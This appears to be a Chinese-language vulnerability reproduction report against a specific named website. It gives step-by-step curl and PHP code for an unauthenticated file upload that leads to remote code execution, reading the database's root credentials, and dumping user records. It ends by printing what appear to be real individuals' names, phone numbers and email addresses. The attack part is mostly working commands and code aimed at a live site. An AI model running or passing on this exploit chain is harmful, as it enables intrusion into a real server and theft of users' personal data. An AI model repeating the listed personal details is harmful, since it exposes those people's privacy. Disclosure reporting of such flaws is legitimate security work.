【测试环境】Windows 或 Mac，Chrome 浏览器，无需登录，无需安装特殊工具（curl 可选）。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
一、确认上传接口（证明接口来源）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

1. 浏览器打开：
   https://www.biobasebaby.com/index.php/formguide/index/index.html?id=5

2. 右键 → 查看网页源代码（或 Ctrl+U）

3. 搜索 image_upload_url，可见上传地址明文写在 JS 中：
   /index.php/attachment/upload/upload/dir/images/module/formguide.html

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
二、未授权上传 PHP 文件（证明可上传）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

4. 本地新建文件 shell.php，内容仅一行：
   <?php phpinfo(); ?>

5. 打开终端执行（Windows 可用 Git Bash）：
   curl -sk -X POST "https://www.biobasebaby.com/index.php/attachment/upload/upload/dir/images/module/formguide.html" -F "file=@shell.php"

6. 服务器返回 JSON，示例：
   {"code":0,"success":1,"state":"SUCCESS","url":"/uploads/images/20260711/xxxxxxxx.php"}
   记录 url 字段中的路径。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
三、验证远程代码执行（证明 RCE）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

7. 浏览器访问（将上一步 url 拼到域名后）：
   https://www.biobasebaby.com/uploads/images/20260711/xxxxxxxx.php

8. 页面显示完整 phpinfo 页面，标题为 PHP Version 7.4.33，证明 PHP 代码已被服务器执行。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
四、读取数据库配置（证明可拿库密码）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

9. 本地新建 readconfig.php，内容：
   <?php echo file_get_contents('/var/www/www.biobasebaby.com/config/database.php'); ?>

10. 同样方式上传 readconfig.php，访问返回的 .php 路径。

11. 页面输出 database.php 全文，可见：
    database = www_biobasebaby
    username = root
    password = （明文数据库密码）
    prefix = yzn_

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
五、查询用户隐私数据（证明明文泄露）
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

12. 本地新建 querydb.php，内容：
    <?php
    header('Content-Type: text/plain; charset=utf-8');
    $pdo = new PDO('mysql:host=localhost;dbname=www_biobasebaby;charset=utf8', 'root', '此处替换为database.php中的密码');
    $rows = $pdo->query("SELECT username,nickname,email,mobile FROM yzn_member LIMIT 3")->fetchAll(PDO::FETCH_ASSOC);
    print_r($rows);
    $rows2 = $pdo->query("SELECT messageusername,messageuserphone,messageuseremail FROM yzn_form_message WHERE messageuserphone REGEXP '^1[3-9]' LIMIT 3")->fetchAll(PDO::FETCH_ASSOC);
    print_r($rows2);
    ?>

13. 上传 querydb.php 并访问返回路径。

14. 页面输出明文数据，示例：
    会员：宋少甫 / 1234@qq.com / 15508670832
    留言：邓龙 / 15286469040 / 1294344558@qq.com
    留言：王宇涵 / 13886001286 / 2416115911@qq.com

复现完成。全程无需登录。
